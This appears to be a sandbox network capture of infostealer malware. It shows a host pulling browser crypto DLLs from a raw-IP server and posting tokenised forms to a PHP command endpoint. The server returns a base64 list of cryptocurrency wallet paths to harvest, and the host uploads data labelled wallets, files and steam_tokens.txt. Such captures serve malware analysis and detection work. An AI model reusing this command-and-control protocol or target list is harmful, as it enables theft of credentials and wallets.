                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                Sep 21, 2024 13:34:23.763212919 CEST91OUTGET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:34:23.939680099 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:23 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                ETag: "94750-5e7ebd4425100"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 608080
                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                Sep 21, 2024 13:34:24.867908955 CEST92OUTGET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:34:25.045979977 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:24 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                ETag: "6dde8-5e7ebd4425100"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 450024
                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                Sep 21, 2024 13:34:25.592271090 CEST88OUTGET /1309cdeb8f4c8736/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:34:25.768224001 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:25 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                ETag: "1f3950-5e7ebd4425100"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 2046288
                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                Sep 21, 2024 13:34:27.570610046 CEST92OUTGET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:34:27.746206045 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:27 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                ETag: "3ef50-5e7ebd4425100"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 257872
                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.296843052 CEST96OUTGET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.472281933 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:28 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                ETag: "13bf0-5e7ebd4425100"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 80880
                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                Sep 21, 2024 13:34:29.105905056 CEST200OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 1067
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:34:29.339804888 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:29 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=84
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Sep 21, 2024 13:34:29.930080891 CEST466OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 267
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 2d 2d 0d 0a
                                                                                                                                                                                                                                Data Ascii: ------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="message"wallets------EHCAEGDHJKFHJKFIJKJE--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:30.109635115 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:30 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Length: 2408
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=83
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                Sep 21, 2024 13:34:30.318741083 CEST464OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FBGHIIJDGHCBFIECBKEG
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 265
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 46 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 2d 2d 0d 0a
                                                                                                                                                                                                                                Data Ascii: ------FBGHIIJDGHCBFIECBKEGContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------FBGHIIJDGHCBFIECBKEGContent-Disposition: form-data; name="message"files------FBGHIIJDGHCBFIECBKEG--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:30.499068022 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:30 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=82
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Sep 21, 2024 13:34:30.822832108 CEST562OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHC
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file"------AKEGDHJDHDAFHJJKJEHC--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:31.046339035 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:30 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=81
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Sep 21, 2024 13:34:31.240106106 CEST471OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HIEHDAFHDHCBFIDGCFID
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 272
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 2d 2d 0d 0a
                                                                                                                                                                                                                                Data Ascii: ------HIEHDAFHDHCBFIDGCFIDContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------HIEHDAFHDHCBFIDGCFIDContent-Disposition: form-data; name="message"ybncbhylepme------HIEHDAFHDHCBFIDGCFID--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:31.479506016 CEST347INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:31 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Length: 120
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=80
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
